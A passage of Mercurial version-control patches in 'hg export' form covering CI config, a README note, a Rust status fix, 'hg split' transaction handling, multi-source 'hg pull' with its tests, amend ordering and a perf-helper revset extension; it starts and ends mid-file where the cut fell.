HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS - -.rust_template: &rust - before_script: - - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no - - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` - - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - - cd /tmp/mercurial-ci/rust/rhg - - cargo build --release - - cd /tmp/mercurial-ci/ - - checks-py2: <<: *runtests variables: @@ -95,7 +84,6 @@ test-py2-rust: <<: *runtests - <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" @@ -103,13 +91,20 @@ test-py3-rust: <<: *runtests - <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" PYTHON: python3 TEST_HGMODULEPOLICY: "rust+c" +test-py3-rhg: + <<: *runtests + variables: + HGWITHRUSTEXT: cpython + RUNTEST_ARGS: "--rust --rhg --blacklist /tmp/check-tests.txt" + PYTHON: python3 + TEST_HGMODULEPOLICY: "rust+c" + test-py2-chg: <<: *runtests variables: # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1615849632 -3600 # Tue Mar 16 00:07:12 2021 +0100 # Node ID c5912e35d06dc5d40769bb3b929fe93ba823b8aa # Parent 6b57144792881bb9cda37d43c59d2b8001177981 README: document requirement for builtin zstd Differential Revision: https://phab.mercurial-scm.org/D10226 diff --git a/README.rst b/README.rst --- a/README.rst +++ b/README.rst @@ -18,3 +18,13 @@ See https://mercurial-scm.org/ for detailed installation instructions, platform-specific notes, and Mercurial user information. + +Notes for packagers +=================== + +Mercurial ships a copy of the python-zstandard sources. This is used to +provide support for zstd compression and decompression functionality. The +module is not intended to be replaced by the plain python-zstandard nor +is it intended to use a system zstd library. Patches can result in hard +to diagnose errors and are explicitly discouraged as unsupported +configuration. # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1615809900 -3600 # Mon Mar 15 13:05:00 2021 +0100 # Node ID 3c9ddb1986a9812507364a828877ce23bc17b535 # Parent c5912e35d06dc5d40769bb3b929fe93ba823b8aa rust-status: fix issue6456 for the Rust implementation also This implementation is being used by a few people now, so we need it fixed, even though a big rewrite will be coming quite soon. Differential Revision: https://phab.mercurial-scm.org/D10217 diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -184,7 +184,13 @@ || other_parent || copy_map.contains_key(filename.as_ref()) { - Dispatch::Modified + if metadata.is_symlink() && size_changed { + // issue6456: Size returned may be longer due to encryption + // on EXT-4 fscrypt. TODO maybe only do it on EXT4? + Dispatch::Unsure + } else { + Dispatch::Modified + } } else if mod_compare(mtime, st_mtime as i32) || st_mtime == options.last_normal_time { diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -199,6 +199,12 @@ st_ctime: metadata.ctime(), } } + + pub fn is_symlink(&self) -> bool { + // This is way too manual, but `HgMetadata` will go away in the + // near-future dirstate rewrite anyway. + self.st_mode & 0170000 == 0120000 + } } /// Returns the canonical path of `name`, given `cwd` and `root` # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1615569340 28800 # Fri Mar 12 09:15:40 2021 -0800 # Node ID 7f6c002d7c0ad34e7b4774c771e60525a9e84f4c # Parent 3c9ddb1986a9812507364a828877ce23bc17b535 split: close transaction in the unlikely event of a conflict while rebasing `hg split` *should* never result in conflicts, but in case there are bugs, we should at least commit the transaction so they can continue the rebase. One of our users ran into the regression fixed by D10120. They fixed the conflict and the tried to continue the rebase, but it failed with "abort: cannot continue inconsistent rebase" because the rebase state referred to commits written in a transaction that was never committed. Side note: `hg split` should probably turn off copy tracing to reduce the impact of such bugs, and to speed it up as well. Copies made in the rebased commits should still be respected because `hg rebase` calls `copies.graftcopies()`. Differential Revision: https://phab.mercurial-scm.org/D10164 diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -27,6 +27,7 @@ revsetlang, rewriteutil, scmutil, + util, ) # allow people to use split without explicitly enabling rebase extension @@ -69,57 +70,62 @@ if opts.get(b'rev'): revlist.append(opts.get(b'rev')) revlist.extend(revs) - with repo.wlock(), repo.lock(), repo.transaction(b'split') as tr: - revs = scmutil.revrange(repo, revlist or [b'.']) - if len(revs) > 1: - raise error.InputError(_(b'cannot split multiple revisions')) + with repo.wlock(), repo.lock(): + tr = repo.transaction(b'split') + # If the rebase somehow runs into conflicts, make sure + # we close the transaction so the user can continue it. + with util.acceptintervention(tr): + revs = scmutil.revrange(repo, revlist or [b'.']) + if len(revs) > 1: + raise error.InputError(_(b'cannot split multiple revisions')) - rev = revs.first() - ctx = repo[rev] - # Handle nullid specially here (instead of leaving for precheck() - # below) so we get a nicer message and error code. - if rev is None or ctx.node() == nullid: - ui.status(_(b'nothing to split\n')) - return 1 - if ctx.node() is None: - raise error.InputError(_(b'cannot split working directory')) + rev = revs.first() + ctx = repo[rev] + # Handle nullid specially here (instead of leaving for precheck() + # below) so we get a nicer message and error code. + if rev is None or ctx.node() == nullid: + ui.status(_(b'nothing to split\n')) + return 1 + if ctx.node() is None: + raise error.InputError(_(b'cannot split working directory')) - if opts.get(b'rebase'): - # Skip obsoleted descendants and their descendants so the rebase - # won't cause conflicts for sure. - descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev)) - torebase = list( - repo.revs( - b'%ld - (%ld & obsolete())::', descendants, descendants + if opts.get(b'rebase'): + # Skip obsoleted descendants and their descendants so the rebase + # won't cause conflicts for sure. + descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev)) + torebase = list( + repo.revs( + b'%ld - (%ld & obsolete())::', descendants, descendants + ) ) - ) - else: - torebase = [] - rewriteutil.precheck(repo, [rev] + torebase, b'split') + else: + torebase = [] + rewriteutil.precheck(repo, [rev] + torebase, b'split') - if len(ctx.parents()) > 1: - raise error.InputError(_(b'cannot split a merge changeset')) + if len(ctx.parents()) > 1: + raise error.InputError(_(b'cannot split a merge changeset')) - cmdutil.bailifchanged(repo) + cmdutil.bailifchanged(repo) - # Deactivate bookmark temporarily so it won't get moved unintentionally - bname = repo._activebookmark - if bname and repo._bookmarks[bname] != ctx.node(): - bookmarks.deactivate(repo) + # Deactivate bookmark temporarily so it won't get moved + # unintentionally + bname = repo._activebookmark + if bname and repo._bookmarks[bname] != ctx.node(): + bookmarks.deactivate(repo) - wnode = repo[b'.'].node() - top = None - try: - top = dosplit(ui, repo, tr, ctx, opts) - finally: - # top is None: split failed, need update --clean recovery. - # wnode == ctx.node(): wnode split, no need to update. - if top is None or wnode != ctx.node(): - hg.clean(repo, wnode, show_stats=False) - if bname: - bookmarks.activate(repo, bname) - if torebase and top: - dorebase(ui, repo, torebase, top) + wnode = repo[b'.'].node() + top = None + try: + top = dosplit(ui, repo, tr, ctx, opts) + finally: + # top is None: split failed, need update --clean recovery. + # wnode == ctx.node(): wnode split, no need to update. + if top is None or wnode != ctx.node(): + hg.clean(repo, wnode, show_stats=False) + if bname: + bookmarks.activate(repo, bname) + if torebase and top: + dorebase(ui, repo, torebase, top) def dosplit(ui, repo, tr, ctx, opts): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615390517 -3600 # Wed Mar 10 16:35:17 2021 +0100 # Node ID ce42fe36d5819c038f702ffce3a09c2b4dcedbb5 # Parent 7f6c002d7c0ad34e7b4774c771e60525a9e84f4c tests: move a test about update in test-pull-update.t Differential Revision: https://phab.mercurial-scm.org/D10154 diff --git a/tests/test-pull-update.t b/tests/test-pull-update.t --- a/tests/test-pull-update.t +++ b/tests/test-pull-update.t @@ -246,3 +246,25 @@ active-before-pull 3:483b76ad4309 $ cd .. + +Issue622: hg init && hg pull -u URL doesn't checkout default branch + + $ hg init test + $ cd test + $ echo foo>foo + $ hg addremove + adding foo + $ hg commit -m 1 + $ cd .. + + $ hg init empty + $ cd empty + $ hg pull -u ../test + pulling from ../test + requesting all changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 340e38bdcde4 + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-pull.t b/tests/test-pull.t --- a/tests/test-pull.t +++ b/tests/test-pull.t @@ -81,21 +81,6 @@ abort: unknown revision 'ffffffffffff' [255] -Issue622: hg init && hg pull -u URL doesn't checkout default branch - - $ cd .. - $ hg init empty - $ cd empty - $ hg pull -u ../test - pulling from ../test - requesting all changes - adding changesets - adding manifests - adding file changes - added 1 changesets with 1 changes to 1 files - new changesets 340e38bdcde4 - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved - Test 'file:' uri handling: $ hg pull -q file://../test-does-not-exist # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615390126 -3600 # Wed Mar 10 16:28:46 2021 +0100 # Node ID bcb5bc2d21e0124b8561fb4d83dcc3d5c0ef1144 # Parent ce42fe36d5819c038f702ffce3a09c2b4dcedbb5 tests: rename `test-pull` to `test-pull-network.t` If is mostly about ssh and http interaction so lets avoid confusion with a generic `hg pull` test Differential Revision: https://phab.mercurial-scm.org/D10155 diff --git a/tests/test-pull.t b/tests/test-pull-network.t rename from tests/test-pull.t rename to tests/test-pull-network.t # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615352042 -3600 # Wed Mar 10 05:54:02 2021 +0100 # Node ID af7535249ea958c69d13efc656b7d74dce0dfdd8 # Parent bcb5bc2d21e0124b8561fb4d83dcc3d5c0ef1144 hg: make `clean` return consistent with the `update` function The function return a boolean and is used as such. Lets be explicit about it. Differential Revision: https://phab.mercurial-scm.org/D10156 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1121,6 +1121,7 @@ assert stats.unresolvedcount == 0 if show_stats: _showstats(repo, stats, quietempty) + return False # naming conflict in updatetotally() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615352067 -3600 # Wed Mar 10 05:54:27 2021 +0100 # Node ID 052ab8d0a538dde808984c7fe3f289d16107f3df # Parent af7535249ea958c69d13efc656b7d74dce0dfdd8 command: clarify `postincoming` return and that return handling The command should return None or a return code. The previous code was returning boolean directly relying on the fact that `True → 1` and `False → 0`. This is a good road to troubles, so lets be explicit about that return. Differential Revision: https://phab.mercurial-scm.org/D10157 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5256,9 +5256,11 @@ :optupdate: updating working directory is needed or not :checkout: update destination revision (or None to default destination) :brev: a name, which might be a bookmark to be activated after updating + + return True if update raise any conflict, False otherwise. """ if modheads == 0: - return + return False if optupdate: try: return hg.updatetotally(ui, repo, checkout, brev) @@ -5280,6 +5282,7 @@ ui.status(_(b"(run 'hg heads' to see heads)\n")) elif not ui.configbool(b'commands', b'update.requiredest'): ui.status(_(b"(run 'hg update' to get a working copy)\n")) + return False @command( @@ -5366,6 +5369,7 @@ ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) ui.flush() other = hg.peer(repo, opts, source) + update_conflict = None try: revs, checkout = hg.addbranchrevs( repo, other, branches, opts.get(b'rev') @@ -5444,7 +5448,7 @@ brev = branches[0] repo._subtoppath = source try: - ret = postincoming( + update_conflict = postincoming( ui, repo, modheads, opts.get(b'update'), checkout, brev ) except error.FilteredRepoLookupError as exc: @@ -5456,7 +5460,10 @@ finally: other.close() - return ret + if update_conflict: + return 1 + else: + return 0 @command( @@ -7546,7 +7553,10 @@ ) modheads = bundle2.combinechangegroupresults(op) - return postincoming(ui, repo, modheads, opts.get('update'), None, None) + if postincoming(ui, repo, modheads, opts.get('update'), None, None): + return 1 + else: + return 0 @command( # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615352635 -3600 # Wed Mar 10 06:03:55 2021 +0100 # Node ID 954bad9c32a0ae23ffe009be9084dff5e76d12c2 # Parent 052ab8d0a538dde808984c7fe3f289d16107f3df pull: pre-indent a part of the function We are about to run it in a loop, so lets pre-indent it to clarify the actual change in the next changesets. Differential Revision: https://phab.mercurial-scm.org/D10158 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5365,101 +5365,104 @@ hint = _(b'use hg pull followed by hg update DEST') raise error.InputError(msg, hint=hint) - source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch')) - ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) - ui.flush() - other = hg.peer(repo, opts, source) - update_conflict = None - try: - revs, checkout = hg.addbranchrevs( - repo, other, branches, opts.get(b'rev') + if True: + source, branches = hg.parseurl( + ui.expandpath(source), opts.get(b'branch') ) - - pullopargs = {} - - nodes = None - if opts.get(b'bookmark') or revs: - # The list of bookmark used here is the same used to actually update - # the bookmark names, to avoid the race from issue 4689 and we do - # all lookup and bookmark queries in one go so they see the same - # version of the server state (issue 4700). - nodes = [] - fnodes = [] - revs = revs or [] - if revs and not other.capable(b'lookup'): - err = _( - b"other repository doesn't support revision lookup, " - b"so a rev cannot be specified." - ) - raise error.Abort(err) - with other.commandexecutor() as e: - fremotebookmarks = e.callcommand( - b'listkeys', {b'namespace': b'bookmarks'} - ) - for r in revs: - fnodes.append(e.callcommand(b'lookup', {b'key': r})) - remotebookmarks = fremotebookmarks.result() - remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks) - pullopargs[b'remotebookmarks'] = remotebookmarks - for b in opts.get(b'bookmark', []): - b = repo._bookmarks.expandname(b) - if b not in remotebookmarks: - raise error.InputError( - _(b'remote bookmark %s not found!') % b + ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) + ui.flush() + other = hg.peer(repo, opts, source) + update_conflict = None + try: + revs, checkout = hg.addbranchrevs( + repo, other, branches, opts.get(b'rev') + ) + + pullopargs = {} + + nodes = None + if opts.get(b'bookmark') or revs: + # The list of bookmark used here is the same used to actually update + # the bookmark names, to avoid the race from issue 4689 and we do + # all lookup and bookmark queries in one go so they see the same + # version of the server state (issue 4700). + nodes = [] + fnodes = [] + revs = revs or [] + if revs and not other.capable(b'lookup'): + err = _( + b"other repository doesn't support revision lookup, " + b"so a rev cannot be specified." + ) + raise error.Abort(err) + with other.commandexecutor() as e: + fremotebookmarks = e.callcommand( + b'listkeys', {b'namespace': b'bookmarks'} ) - nodes.append(remotebookmarks[b]) - for i, rev in enumerate(revs): - node = fnodes[i].result() - nodes.append(node) - if rev == checkout: - checkout = node - - wlock = util.nullcontextmanager() - if opts.get(b'update'): - wlock = repo.wlock() - with wlock: - pullopargs.update(opts.get(b'opargs', {})) - modheads = exchange.pull( - repo, - other, - heads=nodes, - force=opts.get(b'force'), - bookmarks=opts.get(b'bookmark', ()), - opargs=pullopargs, - confirm=opts.get(b'confirm'), - ).cgresult - - # brev is a name, which might be a bookmark to be activated at - # the end of the update. In other words, it is an explicit - # destination of the update - brev = None - - if checkout: - checkout = repo.unfiltered().changelog.rev(checkout) - - # order below depends on implementation of - # hg.addbranchrevs(). opts['bookmark'] is ignored, - # because 'checkout' is determined without it. - if opts.get(b'rev'): - brev = opts[b'rev'][0] - elif opts.get(b'branch'): - brev = opts[b'branch'][0] - else: - brev = branches[0] - repo._subtoppath = source - try: - update_conflict = postincoming( - ui, repo, modheads, opts.get(b'update'), checkout, brev - ) - except error.FilteredRepoLookupError as exc: - msg = _(b'cannot update to target: %s') % exc.args[0] - exc.args = (msg,) + exc.args[1:] - raise - finally: - del repo._subtoppath - - finally: - other.close() + for r in revs: + fnodes.append(e.callcommand(b'lookup', {b'key': r})) + remotebookmarks = fremotebookmarks.result() + remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks) + pullopargs[b'remotebookmarks'] = remotebookmarks + for b in opts.get(b'bookmark', []): + b = repo._bookmarks.expandname(b) + if b not in remotebookmarks: + raise error.InputError( + _(b'remote bookmark %s not found!') % b + ) + nodes.append(remotebookmarks[b]) + for i, rev in enumerate(revs): + node = fnodes[i].result() + nodes.append(node) + if rev == checkout: + checkout = node + + wlock = util.nullcontextmanager() + if opts.get(b'update'): + wlock = repo.wlock() + with wlock: + pullopargs.update(opts.get(b'opargs', {})) + modheads = exchange.pull( + repo, + other, + heads=nodes, + force=opts.get(b'force'), + bookmarks=opts.get(b'bookmark', ()), + opargs=pullopargs, + confirm=opts.get(b'confirm'), + ).cgresult + + # brev is a name, which might be a bookmark to be activated at + # the end of the update. In other words, it is an explicit + # destination of the update + brev = None + + if checkout: + checkout = repo.unfiltered().changelog.rev(checkout) + + # order below depends on implementation of + # hg.addbranchrevs(). opts['bookmark'] is ignored, + # because 'checkout' is determined without it. + if opts.get(b'rev'): + brev = opts[b'rev'][0] + elif opts.get(b'branch'): + brev = opts[b'branch'][0] + else: + brev = branches[0] + repo._subtoppath = source + try: + update_conflict = postincoming( + ui, repo, modheads, opts.get(b'update'), checkout, brev + ) + except error.FilteredRepoLookupError as exc: + msg = _(b'cannot update to target: %s') % exc.args[0] + exc.args = (msg,) + exc.args[1:] + raise + finally: + del repo._subtoppath + + finally: + other.close() if update_conflict: return 1 else: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615352581 -3600 # Wed Mar 10 06:03:01 2021 +0100 # Node ID 685383486d0ad846232dcb7d8040375ec508907d # Parent 954bad9c32a0ae23ffe009be9084dff5e76d12c2 pull: allow to specify multiple sources I end up needing that on a regular basis and it turn out to be very simple to implement. See documentation and test for details. Differential Revision: https://phab.mercurial-scm.org/D10159 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5323,11 +5323,11 @@ ), ] + remoteopts, - _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]'), + _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, helpbasic=True, ) -def pull(ui, repo, source=b"default", **opts): +def pull(ui, repo, *sources, **opts): """pull changes from the specified source Pull changes from a remote repository to a local one. @@ -5351,6 +5351,10 @@ If SOURCE is omitted, the 'default' path will be used. See :hg:`help urls` for more information. + If multiple sources are specified, they will be pulled sequentially as if + the command was run multiple time. If --update is specify and the command + will stop at the first failed --update. + Specifying bookmark as ``.`` is equivalent to specifying the active bookmark's name. @@ -5365,7 +5369,9 @@ hint = _(b'use hg pull followed by hg update DEST') raise error.InputError(msg, hint=hint) - if True: + if not sources: + sources = [b'default'] + for source in sources: source, branches = hg.parseurl( ui.expandpath(source), opts.get(b'branch') ) @@ -5463,6 +5469,9 @@ finally: other.close() + # skip the remaining pull source if they are some conflict. + if update_conflict: + break if update_conflict: return 1 else: diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t new file mode 100644 --- /dev/null +++ b/tests/test-exchange-multi-source.t @@ -0,0 +1,315 @@ +==================================================== +Test push/pull from multiple source at the same time +==================================================== + + +Setup +===== + +main repository +--------------- + + $ . $RUNTESTDIR/testlib/common.sh + $ hg init main-repo + $ cd main-repo + $ mkcommit A + $ mkcommit B + $ mkcommit C + $ mkcommit D + $ mkcommit E + $ hg up 'desc(B)' + 0 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ mkcommit F + created new head + $ mkcommit G + $ hg up 'desc(C)' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ mkcommit H + created new head + $ hg up null --quiet + $ hg log -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + $ cd .. + +Various other repositories +-------------------------- + + $ hg clone main-repo branch-E --rev 4 -U + adding changesets + adding manifests + adding file changes + added 5 changesets with 5 changes to 5 files + new changesets 4a2df7238c3b:a603bfb5a83e + $ hg clone main-repo branch-G --rev 6 -U + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 4a2df7238c3b:c521a06b234b + $ hg clone main-repo branch-H --rev 7 -U + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 4a2df7238c3b:40faebb2ec45 + +Test simple bare operation +========================== + + $ hg clone main-repo test-repo-bare --rev 0 -U + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + + $ hg pull -R test-repo-bare ./branch-E ./branch-G ./branch-H + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + (run 'hg update' to get a working copy) + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + (run 'hg heads' to see heads, 'hg merge' to merge) + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + (run 'hg heads .' to see heads, 'hg merge' to merge) + $ hg log -R test-repo-bare -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +Test operation with a target +============================ + + $ hg clone main-repo test-repo-rev --rev 0 -U + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + +pulling an explicite revision + + $ node_b=`hg log -R main-repo --rev 'desc(B)' -T '{node}'` + $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev $node_b + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 27547f69f254 + (run 'hg update' to get a working copy) + pulling from ./branch-G + no changes found + pulling from ./branch-H + no changes found + $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o B 1 + | + o A 0 + + +pulling a branch head, the branch head resolve to different revision on the +different repositories. + + $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev default + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 3 files + new changesets f838bfaca5c7:a603bfb5a83e + (run 'hg update' to get a working copy) + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + (run 'hg heads' to see heads, 'hg merge' to merge) + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + (run 'hg heads .' to see heads, 'hg merge' to merge) + $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + + +Test with --update +================== + +update without conflicts +------------------------ + + $ hg clone main-repo test-repo-update --rev 0 + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +We update for each pull, so the first on get into a branch independant from the +other and stay there. This is the expected behavior. + + $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ A 0 + + $ hg pull -R test-repo-update ./branch-E ./branch-G ./branch-H --update + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + 4 files updated, 0 files merged, 0 files removed, 0 files unresolved + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + 0 files updated, 0 files merged, 0 files removed, 0 files unresolved + updated to "a603bfb5a83e: E" + 1 other heads for branch "default" + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + 0 files updated, 0 files merged, 0 files removed, 0 files unresolved + updated to "a603bfb5a83e: E" + 2 other heads for branch "default" + $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | @ E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +update with conflicts +--------------------- + + $ hg clone main-repo test-repo-conflict --rev 0 + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +The update has conflict and interrupt the pull. + + $ echo this-will-conflict > test-repo-conflict/D + $ hg add -R test-repo-conflict test-repo-conflict/D + $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ A 0 + + $ hg pull -R test-repo-conflict ./branch-E ./branch-G ./branch-H --update + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + merging D + warning: conflicts while merging D! (edit, then use 'hg resolve --mark') + 3 files updated, 0 files merged, 0 files removed, 1 files unresolved + use 'hg resolve' to retry unresolved file merges + [1] + $ hg -R test-repo-conflict resolve -l + U D + $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ E 4 + | + o D 3 + | + o C 2 + | + o B 1 + | + % A 0 + diff --git a/tests/testlib/common.sh b/tests/testlib/common.sh new file mode 100644 --- /dev/null +++ b/tests/testlib/common.sh @@ -0,0 +1,7 @@ +mkcommit() { + name="$1" + shift + echo "$name" > "$name" + hg add "$name" + hg ci -m "$name" "$@" +} # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1551225260 28800 # Tue Feb 26 15:54:20 2019 -0800 # Node ID 62c2857a174b0d4593ec0e4d5df99c5518fdbc9a # Parent 685383486d0ad846232dcb7d8040375ec508907d amend: mark commit obsolete after moving working copy We were doing it this way: 1. move working copy (repo.setparents) 2. add obsmarkers (scmutil.cleanupnodes) 3. fix dirstate (dirstate.normal/drop) Step 1 and 3 are closely related, so let's move them together. It seems safest to create the obsmarkers last. This patch thus makes the order 1, 3, 2. Differential Revision: https://phab.mercurial-scm.org/D10197 diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -2967,20 +2967,6 @@ # Reroute the working copy parent to the new changeset repo.setparents(newid, nullid) - mapping = {old.node(): (newid,)} - obsmetadata = None - if opts.get(b'note'): - obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])} - backup = ui.configbool(b'rewrite', b'backup-bundle') - scmutil.cleanupnodes( - repo, - mapping, - b'amend', - metadata=obsmetadata, - fixphase=True, - targetphase=commitphase, - backup=backup, - ) # Fixing the dirstate because localrepo.commitctx does not update # it. This is rather convenient because we did not need to update @@ -3003,6 +2989,21 @@ for f in removedfiles: dirstate.drop(f) + mapping = {old.node(): (newid,)} + obsmetadata = None + if opts.get(b'note'): + obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])} + backup = ui.configbool(b'rewrite', b'backup-bundle') + scmutil.cleanupnodes( + repo, + mapping, + b'amend', + metadata=obsmetadata, + fixphase=True, + targetphase=commitphase, + backup=backup, + ) + return newid # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615822554 -3600 # Mon Mar 15 16:35:54 2021 +0100 # Node ID cb70dabe57189d796776e565e5b8f1e5c2cdd4a9 # Parent 62c2857a174b0d4593ec0e4d5df99c5518fdbc9a perf-helper: add a small extension with revsets to select repository subset Playing with discovery requires building interesting case. To do this we need revsets to try to generate them. We start with a quite simple one. See documentation for details. Differential Revision: https://phab.mercurial-scm.org/D10221 diff --git a/contrib/perf-utils/subsetmaker.py b/contrib/perf-utils/subsetmaker.py new file mode 100644 --- /dev/null +++ b/contrib/perf-utils/subsetmaker.py @@ -0,0 +1,94 @@ +"""revset to select sample of repository + +Hopefully this is useful to create interesting discovery cases. +""" + +import collections +import random + +from mercurial.i18n import _ + +from mercurial import ( + registrar, + revset, + revsetlang, + smartset, +) + +revsetpredicate = registrar.revsetpredicate() + + +@revsetpredicate(b'scratch(REVS, <count>, [seed])') +def scratch(repo, subset, x): + """randomly remove <count> revision from the repository top + + This subset is created by recursively picking changeset starting from the + heads. It can be summarized using the following algorithm:: + + selected = set() + for i in range(<count>): + unselected = repo.revs("not <selected>") + candidates = repo.revs("heads(<unselected>)") + pick = random.choice(candidates) + selected.add(pick) + """ + m = _(b"scratch expects revisions, count argument and an optional seed") + args = revsetlang.getargs(x, 2, 3, m) + if len(args) == 2: + x, n = args + rand = random + elif len(args) == 3: + x, n, seed = args + seed = revsetlang.getinteger(seed, _(b"seed should be a number")) + rand = random.Random(seed) + else: + assert False + + n = revsetlang.getinteger(n, _(b"scratch expects a number")) + + selected = set() + heads = set() + children_count = collections.defaultdict(lambda: 0) + parents = repo.changelog._uncheckedparentrevs + + baseset = revset.getset(repo, smartset.fullreposet(repo), x) + baseset.sort() + for r in baseset: + heads.add(r) + + p1, p2 = parents(r) + if p1 >= 0: + heads.discard(p1) + children_count[p1] += 1 + if p2 >= 0: + 